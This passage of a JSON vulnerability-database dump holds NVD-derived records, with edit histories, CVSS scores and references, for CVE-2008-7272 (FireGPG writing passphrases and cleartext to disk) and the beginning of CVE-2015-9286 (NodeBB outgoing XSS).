"https://security-tracker.debian.org/tracker/CVE-2008-7273"}], "immutableFields": []}, {"id": "CVE-2008-7272", "bulletinFamily": "NVD", "title": "CVE-2008-7272", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "published": "2019-11-08T00:15:00", "modified": "2020-02-10T21:16:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "reporter": "cve@mitre.org", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "cvelist": ["CVE-2008-7272"], "type": "cve", "lastseen": "2021-04-21T20:41:43", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T13:59:22", "references": [], "rev": 2}, "score": {"modified": "2020-09-21T13:59:22", "rev": 2, "value": 2.4, "vector": "NONE"}}, "hash": "f6701a04d3477e440e72324b648d7646a2f9466e07e83e341707bb314aec84a0", "hashmap": [{"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "cd391b15e7a01ae2bbfcca256d89bfb8", "key": "cvss3"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "a0acab3127efc281e78e28b6a414532c", "key": "affectedSoftware"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2020-09-21T13:59:22", "modified": "2020-02-10T21:16:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 10}, "differentElements": ["cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T13:59:22"}, {"bulletin": {"affectedSoftware": [{"name": "getfiregpg firegpg", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:getfiregpg:firegpg:-"], "cpe23": [], "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-02-11T14:25:16", "references": [], "rev": 2}, "score": {"modified": "2020-02-11T14:25:16", "rev": 2, "value": 2.4, "vector": "NONE"}}, "hash": "a5439a88032d0d96d6b3b175c5bb2652a08a5ac9dd8565abd675e989e312c52e", "hashmap": [{"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "c78a0c9b48c95bd2d49fb402de9ce674", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "d2db9f7acf8121ca4d72b70e2934db08", "key": "affectedSoftware"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2020-02-11T14:25:16", "modified": "2020-02-10T21:16:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 10}, "differentElements": ["cvss3", "cpe", "affectedSoftware"], "edition": 3, "lastseen": "2020-02-11T14:25:16"}, {"bulletin": {"affectedSoftware": [{"name": "getfiregpg firegpg", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:getfiregpg:firegpg:-"], "cpe23": [], "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user?s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users?s private key.", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-11-15T19:55:37", "references": []}, "score": {"modified": "2019-11-15T19:55:37", "value": 2.4, "vector": "NONE"}}, "hash": "05a389bab8cb239109f07a53e4f0a9c76cc24d31548b23dfad15c1385b48f5a5", "hashmap": [{"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "b0552313c96be75e9ec1c10adb56b096", "key": "modified"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "240c2c1dd6f5cc5cbeb07774547c6c2b", "key": "description"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "c78a0c9b48c95bd2d49fb402de9ce674", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "d2db9f7acf8121ca4d72b70e2934db08", "key": "affectedSoftware"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2019-11-15T19:55:37", "modified": "2019-11-14T14:28:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 2}, "differentElements": ["description", "modified"], "edition": 2, "lastseen": "2019-11-15T19:55:37"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:firegpg:0.6:*:*:*:*:firefox:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 8, "enchantments": {"dependencies": {"modified": "2021-02-02T05:35:21", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T05:35:21", "rev": 2, "value": 2.4, "vector": "NONE"}}, "extraReferences": [{"name": "https://security-tracker.debian.org/tracker/CVE-2008-7272", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7272"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "refsource": "MISC", "tags": ["Third Party Advisory", "Issue Tracking"], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386"}], "hash": "feff88852d5f44ef4f736cb629de97022a0e3f23b99e0deec3d9ee5daaa7d8df", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "4847e3110691b6a6a4c7664c0f127f70", "key": "extraReferences"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "675695b80d1f3d2196a77047e1ceba64", "key": "cpeConfiguration"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "cd391b15e7a01ae2bbfcca256d89bfb8", "key": "cvss3"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "a0acab3127efc281e78e28b6a414532c", "key": "affectedSoftware"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "immutableFields": [], "lastseen": "2021-02-02T05:35:21", "modified": "2020-02-10T21:16:00", "objectVersion": "1.5", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 19}, "different_elements": ["cpeConfiguration"], "edition": 8, "lastseen": "2021-02-02T05:35:21"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "*"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:firegpg:0.6:*:*:*:*:firefox:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 6, "enchantments": {"dependencies": {"modified": "2020-11-29T22:56:16", "references": [], "rev": 2}, "score": {"modified": "2020-11-29T22:56:16", "rev": 2, "value": 2.4, "vector": "NONE"}}, "hash": "20ae55db346f6babbeac989b07a5b26e855e45e42cfda6773d64bbcb84e4ef79", "hashmap": [{"hash": "d647e62c83e294ffd6f56a7c761beece", "key": "affectedSoftware"}, {"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "675695b80d1f3d2196a77047e1ceba64", "key": "cpeConfiguration"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "cd391b15e7a01ae2bbfcca256d89bfb8", "key": "cvss3"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2020-11-29T22:56:16", "modified": "2020-02-10T21:16:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 15}, "differentElements": ["affectedSoftware"], "edition": 6, "lastseen": "2020-11-29T22:56:16"}], "edition": 9, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "a0acab3127efc281e78e28b6a414532c"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "77e03828e2d6f83f8fa932acfe8daff3"}, {"key": "cvelist", "hash": "767e67f900c3effb5b550959d21fb12e"}, {"key": "cvss", "hash": "a89198c45ce87f7ec9735a085150b708"}, {"key": "cvss2", "hash": "9bc143c7676b7e5a3fd9537d7507310b"}, {"key": "cvss3", "hash": "cd391b15e7a01ae2bbfcca256d89bfb8"}, {"key": "cwe", "hash": "92c16862fafe4d9eb26185434339836e"}, {"key": "description", "hash": "95669953499c0eb40b242611dfbe75d4"}, {"key": "extraReferences", "hash": "4847e3110691b6a6a4c7664c0f127f70"}, {"key": "href", "hash": "9258b012e591cc93a7c6b0cd1b5c6b05"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "3c75b36a7f1966a251dbe6148b866f97"}, {"key": "published", "hash": "1162e82aa1c980ee7ebee4af4c99369c"}, {"key": "references", "hash": "54b0c94164bf625d039c58f14cd4c116"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "5db042f8057f3f288fe9cd4213121eb2"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "f34f5d089606f7d870ccc28642bf61f774619d905673726848fc15f3a6590575", "viewCount": 26, "enchantments": {"dependencies": {"references": [], "modified": "2021-04-21T20:41:43", "rev": 2}, "score": {"value": 2.4, "vector": "NONE", "modified": "2021-04-21T20:41:43", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "0.6"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cpe23": [], "cwe": ["CWE-312"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:firegpg:0.6:*:*:*:*:firefox:*:*", "cpe_name": [], "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://security-tracker.debian.org/tracker/CVE-2008-7272", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7272"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "refsource": "MISC", "tags": ["Third Party Advisory", "Issue Tracking"], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386"}], "immutableFields": []}, {"id": "CVE-2015-9286", "bulletinFamily": "NVD", "title": "CVE-2015-9286", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "published": "2019-04-30T14:29:00", "modified": "2019-05-01T14:22:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "reporter": "cve@mitre.org", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "cvelist": ["CVE-2015-9286"], "type": "cve", "lastseen": "2021-04-22T23:51:50", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-02-02T06:21:32", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2021-02-02T06:21:32", "rev": 2, "value": 1.4, "vector": "NONE"}}, "extraReferences": [{"name": "https://github.com/NodeBB/NodeBB/pull/3371", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory"], "url": "https://github.com/NodeBB/NodeBB/pull/3371"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"}, {"name": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "refsource": "MISC", "tags": ["Third Party Advisory", "Release Notes"], "url": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529"}, {"name": "https://www.vulnerability-lab.com/get_content.php?id=1608", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://www.vulnerability-lab.com/get_content.php?id=1608"}], "hash": "e0413d958386f6534538918bca2249dcc4f383174e07b3bfd828fd87bab2fae7", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "db8254901fea804d4d910fc508c1be32", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": 